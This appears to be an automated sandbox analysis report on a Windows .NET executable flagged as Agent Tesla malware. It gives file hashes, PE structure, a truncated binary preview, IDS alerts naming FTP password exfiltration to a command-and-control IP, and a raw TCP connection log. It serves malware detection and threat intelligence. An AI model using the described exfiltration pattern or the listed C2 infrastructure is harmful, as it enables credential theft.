                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):927232
                                                                                                              Entropy (8bit):7.663336014408318
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:1CIee0JW/voReSPECqUYIu6HzxY27/c913X39:IBexvoReSnJu6HzxY2DC1H39
                                                                                                              MD5:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              SHA1:557BAC80418049B3C97821A2B60BB3928211A644
                                                                                                              SHA-256:9802175DC78CEF260413C05623704F267EAA8184D8D6BCB68E15E82DE4EE696E
                                                                                                              SHA-512:63C897DCA939E97E142B95D692B3EA22D46178CEE470CAFCEAAE797226DDEAEC5D6DDBB06346C946700F1860EC4EDE17A03C37E3357E4848E2DC936A192E0FA8
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.Ng..............0.................. ........@.. ....................................@.................................8...S............................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc.......`.......$..............@..B................p.......H.......................H...X...........................................DQ..MN......R.........~...R.y_..........1~............5....8..Y...Jk.....aHK..v-..&.|"_SD}!...6./.=.|.....T7K.......p.C./.x.z...).....4....`..c....l....Z..P.-k...g.....9.....,....F*.y.*..&-...w.6...f.p.....?..".<..p.A...zV t#..Z.(x.a.q.......V....C<..X..._9.,3s..H.j;...F..H.....]...o..S..A"D..$D.....d.x...B.A...+.T7..BTW.H...5;.3........S?C.c.N3`~).K...$D.....d.0..........(....*...0..
                                                                                                              Process:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.663336014408318
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:iNFGd6bDZX.exe
                                                                                                              File size:927'232 bytes
                                                                                                              MD5:8fbffb8434e574ea1bb6865da7af4c8d
                                                                                                              SHA1:557bac80418049b3c97821a2b60bb3928211a644
                                                                                                              SHA256:9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e
                                                                                                              SHA512:63c897dca939e97e142b95d692b3ea22d46178cee470cafceaae797226ddeaec5d6ddbb06346c946700f1860ec4ede17a03c37e3357e4848e2dc936a192e0fa8
                                                                                                              SSDEEP:24576:1CIee0JW/voReSPECqUYIu6HzxY27/c913X39:IBexvoReSnJu6HzxY2DC1H39
                                                                                                              TLSH:B715F19C3A01F44FC942C9354D71EDB8A6586CBB9B069203D6DB3DEFB92DD468E101A3
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.Ng..............0.................. ........@.. ....................................@................................
                                                                                                              Icon Hash:333333ab693b9b98
                                                                                                              Entrypoint:0x4ba78e
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x674ED06B [Tue Dec 3 09:33:31 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba7380x53.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x299b8.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xb87940xb8800e3406a5cd503e4c10735cf7c8ee52a0dFalse0.9046713562838753data7.759793629264103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xbc0000x299b80x29a0010ea48019cf6b645fb74f68baf5dec3bFalse0.6765906531531531data7.091189868949569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xe60000xc0x2000bfb83ba7ce633057f0e29455651fb71False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xbc2500x10d8bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9989130907351854
                                                                                                              RT_ICON0xccfdc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.42335561339169525
                                                                                                              RT_ICON0xdd8040x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.5058455361360416
                                                                                                              RT_ICON0xe1a2c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.5346473029045643
                                                                                                              RT_ICON0xe3fd40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6055347091932458
                                                                                                              RT_ICON0xe507c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7225177304964538
                                                                                                              RT_GROUP_ICON0xe54e40x5aTarga image data - Map 65536 x 3467 x 10.7333333333333333
                                                                                                              RT_GROUP_ICON0xe55400x14data1.05
                                                                                                              RT_VERSION0xe55540x278data0.46835443037974683
                                                                                                              RT_MANIFEST0xe57cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-11T04:21:16.078441+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449741192.254.225.13621TCP
                                                                                                              2025-01-11T04:21:16.551813+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449744192.254.225.13642249TCP
                                                                                                              2025-01-11T04:21:16.559832+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449744192.254.225.13642249TCP
                                                                                                              2025-01-11T04:21:23.851673+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449752192.254.225.13621TCP
                                                                                                              2025-01-11T04:21:24.331495+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753192.254.225.13647402TCP
                                                                                                              2025-01-11T04:21:24.336767+01001800009Joe Security MALWARE AgentTesla - FTP Exfil Passwords1192.168.2.449753192.254.225.13647402TCP
                                                                                                              2025-01-11T04:21:24.336767+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449753192.254.225.13647402TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 04:21:01.571227074 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:01.571276903 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:01.571403027 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:01.595890999 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:01.595931053 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.072813034 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.072909117 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:02.076142073 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:02.076154947 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.076450109 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.123625040 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:02.159624100 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:02.203373909 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.273188114 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.273256063 CET44349732104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:02.273576975 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:02.279181004 CET49732443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:03.334166050 CET4973421192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:03.340375900 CET2149734192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:03.342061996 CET4973421192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:03.375030041 CET4973421192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:03.380281925 CET2149734192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:03.382069111 CET4973421192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:03.525557995 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:03.530498028 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:03.530874014 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.064600945 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.064807892 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.069725037 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.211875916 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.212030888 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.217044115 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.464126110 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.464263916 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.469178915 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.610708952 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.610861063 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.615803957 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.756031990 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.756161928 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.761132002 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.903832912 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:04.904047012 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:04.909003019 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.049140930 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.050005913 CET4973838934192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.055422068 CET3893449738192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.055502892 CET4973838934192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.055555105 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.060642958 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.532484055 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.532713890 CET4973838934192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.532879114 CET4973838934192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.537781000 CET3893449738192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.537813902 CET3893449738192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.537842035 CET3893449738192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.538053989 CET3893449738192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.538108110 CET4973838934192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.612699032 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.678498030 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.678908110 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.683824062 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.825026989 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.825445890 CET4973949382192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.830367088 CET4938249739192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:05.831938028 CET4973949382192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.833170891 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:05.838068008 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:06.298521042 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:06.298715115 CET4973949382192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:06.303879023 CET4938249739192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:06.303932905 CET4973949382192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:06.444796085 CET2149735192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:06.444871902 CET4973521192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:13.075859070 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.075903893 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.075973034 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.082731962 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.082740068 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.543600082 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.543704987 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.545080900 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.545100927 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.545496941 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.594543934 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.605335951 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.647334099 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.718198061 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.718283892 CET44349740104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:13.718358994 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:13.720978022 CET49740443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:14.539722919 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:14.544851065 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:14.544936895 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.081118107 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.081290007 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.086209059 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.227514029 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.227643013 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.232517004 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.485028028 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.485250950 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.490227938 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.631519079 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.632368088 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.637247086 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.778208971 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.778373003 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.783211946 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.924542904 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:15.925431967 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:15.930246115 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.071548939 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.072828054 CET4974442249192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.077680111 CET4224949744192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.077831030 CET4974442249192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.078440905 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.083369970 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.551496029 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.551812887 CET4974442249192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.551882982 CET4974442249192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.556746960 CET4224949744192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.556951046 CET4224949744192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.559832096 CET4974442249192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.592427015 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.699701071 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.721009970 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.725908995 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.867297888 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.867693901 CET4974649326192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.872601032 CET4932649746192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:16.872669935 CET4974649326192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.872740984 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:16.877484083 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.344033957 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.344335079 CET4974649326192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.344335079 CET4974649326192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.349200010 CET4932649746192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.349217892 CET4932649746192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.349231958 CET4932649746192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.349519014 CET4932649746192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.349574089 CET4974649326192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.389292002 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.491111040 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.491470098 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.496258020 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.637845039 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.638222933 CET4974836065192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.643155098 CET3606549748192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:17.643228054 CET4974836065192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.643291950 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:17.648112059 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:18.114681959 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:18.114892960 CET4974836065192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:18.119940042 CET3606549748192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:18.119997025 CET4974836065192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:18.170531988 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:18.262296915 CET2149741192.254.225.136192.168.2.4
                                                                                                              Jan 11, 2025 04:21:18.311184883 CET4974121192.168.2.4192.254.225.136
                                                                                                              Jan 11, 2025 04:21:21.269134045 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.269187927 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.269265890 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.272104025 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.272119045 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.726936102 CET44349751104.26.12.205192.168.2.4
                                                                                                              Jan 11, 2025 04:21:21.727020025 CET49751443192.168.2.4104.26.12.205
                                                                                                              Jan 11, 2025 04:21:21.729027033 CET49751443192.168.2.4104.26.12.205
